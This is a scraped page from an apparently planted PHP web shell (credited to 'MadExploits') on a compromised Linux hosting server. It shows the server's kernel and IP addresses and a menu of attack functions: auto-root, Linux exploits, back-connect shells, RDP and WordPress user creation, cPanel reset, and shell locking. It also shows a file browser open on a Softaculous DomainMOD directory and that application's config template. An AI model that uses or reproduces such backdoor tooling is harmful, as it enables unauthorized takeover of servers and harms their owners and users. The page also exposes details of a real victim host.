Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.221.248.140
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
domainmod /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
404
B
-rw-r--r--
clone.php
4.81
KB
-rw-r--r--
config.inc.php
1.16
KB
-rw-r--r--
edit.php
4.43
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
421
B
-rw-r--r--
import.php
3.22
KB
-rw-r--r--
info.xml
4.26
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
3.81
KB
-rw-r--r--
install.xml
1.12
KB
-rw-r--r--
md5
1.41
KB
-rw-r--r--
notes.txt
713
B
-rw-r--r--
upgrade.php
2.54
KB
-rw-r--r--
upgrade.xml
311
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.inc.php
<?php /** * /_includes/config.SAMPLE.inc.php * * This file is part of DomainMOD, an open source domain and internet asset manager. * Copyright (c) 2010-2024 Greg Chetcuti <greg@chetcuti.com> * * Project: http://domainmod.org Author: http://chetcuti.com * * DomainMOD is free software: you can redistribute it and/or modify it under the terms of the GNU General Public * License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later * version. * * DomainMOD is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied * warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along with DomainMOD. If not, see * http://www.gnu.org/licenses/. * */ ?> <?php // Path Settings $web_root = '[[relativeurl]]'; // don't include trailing slash (if you're installing in the root just leave this blank) // Database Settings $dbhostname = '[[softdbhost]]'; $dbname = '[[softdb]]'; $dbusername = '[[softdbuser]]'; $dbpassword = '[[softdbpass]]';
Close